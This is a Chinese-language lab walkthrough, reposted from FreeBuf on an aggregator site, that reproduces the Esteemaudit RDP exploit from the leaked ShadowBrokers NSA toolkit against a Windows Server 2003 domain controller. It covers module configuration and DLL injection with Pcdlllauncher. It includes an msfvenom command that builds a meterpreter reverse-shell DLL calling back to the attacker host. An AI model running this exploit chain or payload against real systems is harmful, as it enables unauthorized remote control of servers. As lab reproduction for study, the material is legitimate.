当前位置:主页 > 资料 >

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程
栏目分类:资料   发布日期:2017-04-20   浏览次数:

导读:本文为去找网小编(www.7zhao.net)为您推荐的ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程,希望对您有所帮助,谢谢! 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在st

本文为去找网小编(www.7zhao.net)为您推荐的ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程,希望对您有所帮助,谢谢! 欢迎访问www.7zhao.net



内容来自www.7zhao.net

近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。以下是其中Esteemaudit漏洞复现过程。 本文来自去找www.7zhao.net

前期准备

IP 系统信息 用途 备注
192.168.146.132 Windows xp 攻击机 需安python2.6.6&pywin32
192.168.146.129 kali 2.0 用于生成攻击payload(反弹shell等)和控制反弹的shell会话 生成reverse shell 的dll
192.168.146.136 Windows Server 2003 靶机 域控环境

靶机环境

去找(www.7zhao.net欢迎您

需要域控环境 内容来自www.7zhao.net

Esteemaudit漏洞复现过程

use Esteemaudit使用漏洞模块

www.7zhao.net

www.7zhao.net

设置目标IP和端口 copyright www.7zhao.net

内容来自www.7zhao.net

然后基本上默认,基本配置如下:

去找(www.7zhao.net欢迎您

本文来自去找www.7zhao.net

运行后再进行配置。

欢迎访问www.7zhao.net

copyright www.7zhao.net

然后基本上选择相对应的设置,CallbackIp填自己的,端口随便

内容来自www.7zhao.net

www.7zhao.net

然后配置DLL。注意这里默认路径基本上是不对,找到自己对应的文件路径进行修改:

去找(www.7zhao.net欢迎您

欢迎访问www.7zhao.net

然后基本上配置如下

去找(www.7zhao.net欢迎您

内容来自www.7zhao.net

可以运行了 内容来自www.7zhao.net

欢迎访问www.7zhao.net

利用Pcdlllauncher注入DLL

使用Pcdlllauncher

内容来自www.7zhao.net

use Pcdlllauncher
 

www.7zhao.net

copyright www.7zhao.net

然后生成用于反弹shell的dll payload:

内容来自www.7zhao.net

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll copyright www.7zhao.net 

欢迎访问www.7zhao.net

然后进行配置 copyright www.7zhao.net

找到自己对应的文件路径修改

本文来自去找www.7zhao.net

去找(www.7zhao.net欢迎您

要注入的恶意DLL文件路径 内容来自www.7zhao.net

去找(www.7zhao.net欢迎您

然后基本上默认,运行就行了,成功注入

内容来自www.7zhao.net

查看Metasploit,成功返回shell

去找(www.7zhao.net欢迎您

内容来自www.7zhao.net

欢迎访问www.7zhao.net


本文原文地址:http://www.freebuf.com/articles/system/132171.html

以上为ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程文章的全部内容,若您也有好的文章,欢迎与我们分享! 内容来自www.7zhao.net

Copyright ©2008-2017去找网版权所有   皖ICP备12002049号-2 皖公网安备 34088102000435号   关于我们|联系我们| 免责声明|友情链接|网站地图|手机版